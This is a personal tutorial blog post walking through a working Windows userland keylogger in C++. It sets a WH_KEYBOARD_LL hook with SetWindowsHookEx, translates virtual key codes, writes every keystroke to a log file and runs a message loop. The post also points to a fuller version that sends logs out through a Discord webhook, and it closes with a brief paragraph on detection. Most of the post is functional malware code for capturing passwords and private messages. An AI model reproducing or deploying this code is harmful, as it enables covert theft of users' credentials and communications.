Obsess over every detail. Ask why it works. Ask why it isn’t built another way.

Intro

I’ve been messing around with malware development recently, and as part of my second warm-up project, I decided to write a simple keylogger. The goal here is to understand how userland keyloggers work on Windows, without getting overwhelmed by low-level internals.

What is a keylogger?

A keylogger is a type of malware designed to record keystrokes in order to steal sensitive information such as passwords, credit card numbers, and private messages.

Keyloggers can exist at different levels:

In this article, we’ll focus only on userland keyloggers, specifically how they work and how they’re commonly implemented.

Most keyloggers store captured keystrokes in a file, but it’s also possible to exfiltrate them directly without ever touching disk. For simplicity, we’ll stick to basic file-based logging.

How does a userland keylogger work?

Before writing a keylogger, it helps to understand how keyboard input flows through Windows — at a high level.

Every key on a keyboard has a scan code, which is a hardware-level identifier sent when:

Windows processes keyboard input in layers:

1. Physical layer

The keyboard generates scan codes for key press and release events.

2. Driver layer

Keyboard drivers translate scan codes into virtual key codes (VK_*).

3. Userland

Applications receive these events as Windows messages, such as:

For example, a virtual key code might look like this:

1
2
3
case VK_NUMPAD0:
    key = "0";
    break;

Implementation

Let’s start with the implementation. Don’t worry, I’ll walk through it step by step. First, we’ll create a keyboard hook.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
int main()
{

  // 1. Create a keyboard hook
  HHOOK keyboardHook = SetWindowsHookEx (

      WH_KEYBOARD_LL,       // Type of hook procedure to be installed, I chose WH_KEYBOARD_LL to monitor low level keyboard inputs
                            // https://learn.microsoft.com/en-us/windows/win32/winmsg/lowlevelkeyboardproc

      LowLevelKeyboardProc, // 2. Pointer to the hook procedure ( Every keyboard events, windows will call LowLevelKeyboardProc() )
                            // 3. Note that the program itself doesn't call the function, Windows does whenever there's a keyboard event
      NULL,
      0

  );

  if ( keyboardHook == NULL )
  {
    std::cerr << "[ Failed to hook keyboard, exiting! ] \n";
    return 1;
  }

  // 4. Keep program alive and process windows internal messages
  // WH_KEYBOARD_LL require a GetMessage loop because their callbacks are queed as messages to the hooking thread's message queue
  MSG msg;

  while ( GetMessage ( &msg, NULL, 0, 0 ) )
  {
    TranslateMessage ( &msg );
    DispatchMessage ( &msg );
  }

  /*

  +------------------------------------------------------------------------------+
  | - SetWindowsHookEx     = Hey Windows, send me letters when someone types     |
  | - GetMessage loop      = You(Your program) checking your mailbox repeatedly  |
  | - LowLevelKeyboardProc = What you do when you receive a letter               |
  +------------------------------------------------------------------------------+

  */

  // It'll only unhook the keyboard once the GetMessage() loop stops (most likely closed by the user)
  UnhookWindowsHookEx ( keyboardHook );

  Logger::outputFile.close ();
  std::cout << "[ Stopped capturing] \n";

  return 0;
}

Okay bro wait, what do you even mean by keyboard hook and what are these weird functions?

A hook is simply a mechanism that allows applications to intercept system-wide events, such as mouse input, keystrokes, or window messages, before they reach their target application.

You can think of it like a checkpoint: events pass through it, and you get a chance to inspect them. In this case, we’re intercepting keyboard events so we can log them.

The important thing to understand is:

Make sure to read the comments in the code and refer to the MSDN documentation, it helps a lot here.

Handling and translating virtual keycodes

Next, we need a way to translate virtual key codes into readable characters.

We’ll track modifier state first:

1
2
3
4
5
namespace KeyboardState
{
  BOOL shift = false;
  BOOL capsLock = false;
}

Now we create a function that converts virtual key codes into characters:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
std::string hookCode ( DWORD code, BOOL capsLock, BOOL shift )
{
  std::string key;
  switch ( code ) // SWITCH ON INT
  {
  // Char keys for ASCI
  // No VM Def in header
  case 0x41:
    key = capsLock ? ( shift ? "a" : "A" ) : ( shift ? "A" : "a" );
    break;
  case 0x42:
    key = capsLock ? ( shift ? "b" : "B" ) : ( shift ? "B" : "b" );
    break;
  case 0x43:
    key = capsLock ? ( shift ? "c" : "C" ) : ( shift ? "C" : "c" );
    break;

 // Keys
  case VK_NUMLOCK:
    key = " [NUM-LOCK] ";
    break;
  case VK_SCROLL:
    key = " [SCROLL-LOCK] ";
    break;
 default:
    key = "[UNK-KEY]";
    break;
  }

  return key;
}

If you’re wondering what these 0x41, 0x42, etc. values are: they’re virtual key codes. For example, according to the MSDN documentation, 0x41 corresponds to the A key.

We’re simply translating these numeric values into readable characters so the logs make sense.

Creating the hook callback

Now let’s implement the function that Windows calls whenever a keyboard event occurs.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
LRESULT CALLBACK LowLevelKeyboardProc ( int code, WPARAM wParam, LPARAM lParam )
{
  /*

    LRESULT CALLBACK LowLevelKeyboardProc
    (

    int code,        // Status: HC_ACTION, or negative
    WPARAM wParam,   // Event type: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, etc.
    LPARAM lParam    // Pointer to KBDLLHOOKSTRUCT (detailed keyboard info)

    )

    https://learn.microsoft.com/en-us/windows/win32/winmsg/lowlevelkeyboardproc

*/

  SHORT getcapsLockStatus = GetKeyState ( VK_CAPITAL );

  if ( ( getcapsLockStatus & 0x0001 ) != 0 )
  {
    // Check if the low-order bit is set
    KeyboardState::capsLock = true;
  }

  else
  {
    KeyboardState::capsLock = false;
  }

  // Create a pointer of KBDLLHOOKSTRUCT that contains keyboard event details (vkCode, scanCode, flags, etc.)
  KBDLLHOOKSTRUCT *keyboardData = reinterpret_cast<KBDLLHOOKSTRUCT *> ( lParam );

  // Is this a valid keyboard event that we can process? if yes then proceed
  if ( code == HC_ACTION )
  {
    // Check if shift is pressed

    /*

     After creating a pointer to KBDLLHOOKSTRUCT we can now check virtual keycodes like this
     p->vkCode

    typedef struct tagKBDLLHOOKSTRUCT {
      DWORD     vkCode;
      DWORD     scanCode;
      DWORD     flags;
      DWORD     time;
      ULONG_PTR dwExtraInfo;
    } KBDLLHOOKSTRUCT, *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;

     */

    // Checks if Shift is pressed1
    if ( keyboardData->vkCode == VK_LSHIFT || keyboardData->vkCode == VK_RSHIFT )
    {
      if ( wParam == WM_KEYDOWN )
      {
        KeyboardState::shift = true;
      }

      else
      {
        KeyboardState::shift = false;
      }
    }

    // Checks if a key is pressed down
    if ( wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN )
    {
      if ( keyboardData->vkCode )
      {

        // Clear the contents of the buffer
        Logger::output.str ( "" );

        // Store the keylogs in buffer
        Logger::output << hookCode ( keyboardData->vkCode, KeyboardState::capsLock, KeyboardState::shift );

        // Store the buffer data inside outputFile
        Logger::outputFile << Logger::output.str ();
        Logger::outputFile.flush ();

        // Print the contnets of outputFile
        std::cout << Logger::output.str ();
      }

     }
    }
  }

  // Pass the event to the next hook to avoid breaking input
  return CallNextHookEx ( NULL, code, wParam, lParam );
}

At this point, we have all the core components in place: a keyboard hook to intercept input, a hook callback that Windows invokes on each keyboard event, a keycode translation system to convert virtual key codes into readable characters, and a message loop to keep the process alive. Together, these pieces are enough to build a fully functional userland keylogger. The full version which also includes file exfiltration and sending logs via a Discord webhook is available on my GitHub feel free to reference it.

poc

Now, how do we detect this?

Processing WM_KEYDOWN in a background process with no visible UI can already be a red flag, especially if the program has no real reason to care about keyboard input. On its own, WM_KEYDOWN is normal and used everywhere, but it becomes suspicious when a process keeps handling these messages while not in focus, having no active window, and offering no user-facing functionality. When this is paired with a global low-level keyboard hook (WH_KEYBOARD_LL), a hook that stays installed for a long time, and keystrokes being stored or buffered somewhere, it starts to look much more like keylogging behavior than a legitimate app.

that’s all bye, wibbly woobly wobbly woo! 67 gyat sigma